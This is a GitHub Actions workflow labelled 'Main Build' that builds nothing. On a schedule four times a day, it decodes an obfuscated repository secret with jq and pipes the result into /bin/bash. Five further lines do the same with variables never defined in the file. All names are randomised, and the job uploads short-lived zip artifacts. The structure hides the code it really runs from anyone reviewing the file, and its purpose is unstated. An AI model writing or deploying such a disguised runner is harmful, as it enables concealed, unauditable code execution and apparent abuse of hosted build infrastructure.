name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '38 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          esjs8: ${{ secrets.esjs8 }}
        run: |
          printf '%s' "$esjs8" | jq -r .tgr5393 | /bin/bash
          printf '%s' "$gahb6465" | jq -r .caic69 | /bin/bash
          printf '%s' "$shyw6738" | jq -r .dsvh1666 | /bin/bash
          echo $kgx5 | jq -r .fruhl6308 | /bin/bash
          printf '%s' "$vy8675" | jq -r .t884 | /bin/bash
          printf '%s' "$ww3072" | jq -r .h657 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: 4czRycGO
          path: "*.zip"
          retention-days: 1
